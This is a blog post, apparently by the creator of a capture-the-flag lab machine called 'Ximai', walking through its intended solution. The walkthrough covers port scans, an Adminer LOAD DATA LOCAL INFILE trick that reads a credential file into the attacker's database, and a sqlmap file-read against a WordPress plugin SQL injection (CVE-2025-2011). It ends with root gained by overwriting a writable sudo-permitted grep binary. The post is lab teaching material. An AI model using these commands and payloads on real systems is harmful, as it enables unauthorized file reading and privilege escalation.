banner
言心吾

言心吾のBlog

吾言为心声
HomeArchivesLinks

Ximai Target Machine Question Review

32
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The document describes a network scanning process using RustScan and Nmap on the IP address 192.168.56.62. It identifies several open ports: 22 (SSH), 80 (HTTP), 3306 (MySQL), and 8000 (HTTP). The services running on these ports include OpenSSH, Apache HTTP Server, and MariaDB. The scan reveals details such as service versions and supported HTTP methods. The host is confirmed to be up, and the scan completes successfully, providing information about the operating system and network interface.

Initial Access#

└─# rustscan -a `IP` -- -sCV -Pn -n                              
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
TreadStone was here 🚀

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 192.168.56.62:22
Open 192.168.56.62:80
Open 192.168.56.62:3306
Open 192.168.56.62:8000
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sCV -Pn -n" on ip 192.168.56.62
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-31 15:36 CST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:36
Completed NSE at 15:36, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:36
Completed NSE at 15:36, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:36
Completed NSE at 15:36, 0.00s elapsed
Initiating ARP Ping Scan at 15:36
Scanning 192.168.56.62 [1 port]
Completed ARP Ping Scan at 15:36, 0.05s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 15:36
Scanning 192.168.56.62 [4 ports]
Discovered open port 22/tcp on 192.168.56.62
Discovered open port 80/tcp on 192.168.56.62
Discovered open port 3306/tcp on 192.168.56.62
Discovered open port 8000/tcp on 192.168.56.62
Completed SYN Stealth Scan at 15:36, 0.03s elapsed (4 total ports)
Initiating Service scan at 15:36
Scanning 4 services on 192.168.56.62
Completed Service scan at 15:36, 12.46s elapsed (4 services on 1 host)
NSE: Script scanning 192.168.56.62.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:36
Completed NSE at 15:36, 2.60s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:36
Completed NSE at 15:36, 0.13s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:36
Completed NSE at 15:36, 0.00s elapsed
Nmap scan report for 192.168.56.62
Host is up, received arp-response (0.00074s latency).
Scanned at 2025-05-31 15:36:20 CST for 15s

PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 64 OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDRmicDuAIhDTuUUa37WCIEK2z2F1aDUtiJpok20zMzkbe1B41ZvvydX3JHjf7mgl0F/HRQlGHiA23Il+dwr0YbbBa2ggd5gDl95RSHhuUff/DIC10OFbP3YU8A4ItFb8pR6dN8jr+zU1SZvfx6FWApSkTJmeLPq9PN889+ibvckJcOMqrm1Y05FW2VCWn8QRvwivnuW7iU51IVz7arFe8JShXOLu0ANNqZEXyJyWjaK+MqyOK6ZtoWdyinEQFua81+tBZuvS+qb+AG15/h5hBsS/tUgVk5SieY6cCRvkYFHB099e1ggrigfnN4Kq2GvzRUYkegjkPzJFQ7BhPyxT/kDKrlVcLX54sXrp0poU5R9SqSnnESXVM4HQfjIIjTrJFufc2nBF+4f8dH3qtQ+jJkcPEKNVSKKEDULEk1BSBdokhh1GidxQY7ok+hEb9/wPmo6RBeb1d5t11SP8R5UHyI/yucRpS2M8hpBaovJv8pX1VwpOz3tUDJWCpkB3K8HDk=
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI2Hl4ZEYgnoDQflo03hI6346mXex6OPxHEjxDufHbkQZVosDPFwZttA8gloBLYLtvDVo9LZZwtv7F/EIiQoIHE=
|   256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILRLvZKpSJkETalR4sqzJOh8a4ivZ8wGt1HfdV3OMNY1
80/tcp   open  http    syn-ack ttl 64 Apache httpd 2.4.62 ((Debian))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.62 (Debian)
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
3306/tcp open  mysql   syn-ack ttl 64 MariaDB 10.3.23 or earlier (unauthorized)
8000/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.62 ((Debian))
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.62 (Debian)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-generator: WordPress 6.8.1
|_http-title: NeonGrid Solutions
MAC Address: 08:00:27:DD:A7:DA (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:36
Completed NSE at 15:36, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:36
Completed NSE at 15:36, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:36
Completed NSE at 15:36, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.70 seconds
           Raw packets sent: 5 (204B) | Rcvd: 5 (204B)

Four ports 22, 80, 3306, and 8000 are open, with 80 and 8000 being web, 22 being ssh, and 3306 being MySQL.

Of course, although port 3306 is open, attempts to connect reveal it to be a "smoke screen" and cannot be connected.

80 - web#

Can be scanned with dirsearch
/info.php
/adminer.php

Using gobuster with a medium dictionary for deeper scanning, another file was found
/reminder.php

reminder.php#

image

Obtained a username: jimmy

The image address in the middle of the webpage is: http://192.168.56.62/that-place-where-i-put-that-thing-that-time/1b260614-3aff-11f0-ac81-000c2921b441.jpg

Upon visiting this path, we can find another creds file at /etc/jimmy.txt

image

image

In context, this jimmy.txt likely contains the password for the jimmy user! It seems our main goal is to find a way to read this file.

Additionally, there seems to be an SQL injection at the bottom of the page.
image

However, when you try to input multiple single quotes, you find that regardless of whether the count is odd or even, it throws an error, which is quite unusual! Typically, an odd number of single quotes would cause an error, while an even number would not, so this is a rabbit hole I left.

That said, using SQL injection to read files is indeed a good idea; perhaps there are other "real" injection points elsewhere?

adminer.php#

Next, let's take a look at /adminer.php.
image

image

Adminer is a lightweight database management tool that allows us to connect to any database. However, this Adminer is the latest version and has no known vulnerabilities. Without database credentials, we will set it aside for now, as "a clever woman cannot cook without rice."

8000 - web#

Scanning port 8000 reveals a domain, wordpress.local, which we add to /etc/hosts and then access.

It turns out to be the latest version of WordPress, with no modifications.

One article provides a hint, which corresponds to two exploitation schemes.
image

mysqli.allow_local_infile = on is quite interesting:
mysqli.allow_local_infile is a PHP configuration that controls whether to allow loading data from the local file system into the MySQL database using the LOAD DATA INFILE statement. This means that if we can control the database connection, we can exploit this feature to read any file on the target machine and write it to our database!

With a clear idea, we act immediately! We can set up a MySQL database on the Kali attack machine and then use Adminer for "database hijacking" to "transport" files from the target machine.

First, edit the Kali MySQL configuration file /etc/mysql/mariadb.conf.d/50-server.cnf, changing bind-address = 127.0.0.1 to bind-address = 0.0.0.0, so our database can accept external connections. Then start the service.

Next, connect to our Kali database in the Adminer interface,

image

Then execute the following SQL commands:

image

-- Create a table to store data
CREATE TABLE exploit (
    data TEXT
);
-- Use local infile syntax to load the target file
LOAD DATA LOCAL INFILE '/etc/jimmy.txt' INTO TABLE exploit 
FIELDS TERMINATED BY "\n";

-- Query results
select * from exploit;

This retrieves the password HandsomeHU.

For a detailed exploitation process, you can refer to this article: https://infosecwriteups.com/adminer-script-results-to-pwning-server-private-bug-bounty-program-fe6d8a43fe6f

Of course, here's a "spoiler": the latest version of Adminer does not allow you to operate this way; the success here is due to my modification of the source code: $this->options(MYSQLI_OPT_LOCAL_INFILE,true)

The above is the standard solution. To lower the difficulty, I also left a backdoor—an SQL injection vulnerability exists in a WordPress plugin.

Using wpscan might be slow, but using nuclei yields results quickly and is still very useful:

nuclei -u http://wordpress.local:8000

image

Downloading the CVE-2025-2011 POC and trying repeatedly found it ineffective; this POC is broken.

└─$ python3 52285.py -u http://wordpress.local:8000
╔════════════════════════════════════════════════════════════════╗
║ CVE-2025-2011 - SQLi in Depicter Slider & Popup Builder <3.6.2 ║
║ By datagoboom ║
╚════════════════════════════════════════════════════════════════╝
[*] Target URL: http://wordpress.local:8000
[+] Successfully connected to the target
[*] Checking if the target is vulnerable...
[-] Target does not appear to be vulnerable
[*] Try checking manually in your browser:
http://wordpress.local:8000/wp-admin/admin-ajax.php?s=test%' AND
EXTRACTVALUE(1,CONCAT(0x7e,VERSION(),0x7e))='&perpage=20&page=1&orderBy=source_id&dateEnd=&dateStart=&order=D
ESC&sources=&action=depicter-lead-index
[-] Exiting as target does not appear to be vulnerable

Analyzing the vulnerability reveals the injection point is admin-ajax.php?s=test*&perpage=20&page=1&orderBy=source_id&dateEnd=&dateStart=&order=DESC&sources=&action=depicter-lead-index
So sqlmap is used.

Here, I didn't intend for you to get a shell; I just needed to exploit the SQL injection to read files.

sqlmap -u 'http://wordpress.local:8000/wp-admin/admin-ajax.php?s=t*&perpage=20&page=1&orderBy=source_id&dateEnd=&dateStart=&order=DESC&sources=&action=depicter-lead-index' --batch --file-read=/etc/jimmy.txt

image

So, all roads lead to Rome. Of course, if you can read the wp-config file, obtain the database password, and then connect to the database via Adminer to change the WordPress admin password to access the backend, that is also a straightforward path. :)

Privilege Escalation#

jimmy#

SSH login as the jimmy user. You will find that the environment variables have been tampered with, causing many commands to be unable to execute directly. However, this doesn't stump us; executing commands with absolute paths can bypass this. There are many solutions, such as exporting PATH yourself, deleting the modified line in .bashrc, or even deleting .bashrc entirely.
image

There are two local users: adminer and jimmy.

In the wp-config file, find the adminer user password, as well as the MySQL database password.
image

Interestingly, the WordPress adminer user and the system adminer user share the same password.

adminer#

The adminer user can execute /usr/bin/grep without a password.

su adminer
adminer@Ximai:/var/www/wordpress$ sudo -l
Matching Defaults entries for adminer on Ximai:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User adminer may run the following commands on Ximai:
(ALL) NOPASSWD: /usr/bin/grep
adminer@Ximai:/var/www/wordpress$ sudo /usr/bin/grep ' ' /root/root.txt
sorry, you are restricted from using this command.try egrep instead.

This grep command has clearly been tampered with:

jimmy@Ximai:/var/www/wordpress$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp:/snap/bin
jimmy@Ximai:/var/www/wordpress$ file /usr/bin/grep
/usr/bin/grep: ASCII text
jimmy@Ximai:/var/www/wordpress$ ls -l /usr/bin/grep
-rwxr-xrwx 1 root root 76 May 28 09:06 /usr/bin/grep
jimmy@Ximai:/var/www/wordpress$ cat /usr/bin/grep
echo 'sorry, you are restricted from using this command.try egrep instead.'
jimmy@Ximai:/var/www/wordpress$

Finding that it has write permissions makes it easy; just cp /bin/bash /usr/bin/grep to overwrite it.

Conclusion#

Overall, I find this target machine to be of easy to medium difficulty. The web portion has left two entry points related to databases/SQL, both of which are not difficult. Of course, there are indeed many redundant elements in the target machine, requiring careful enumeration and a bit of patience to "pan for gold."

The privilege escalation part is relatively simple, mainly testing attention to detail. That's about it; I hope the target machine I created can provide you with some insights, and I welcome everyone to share their thoughts in the comments!

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.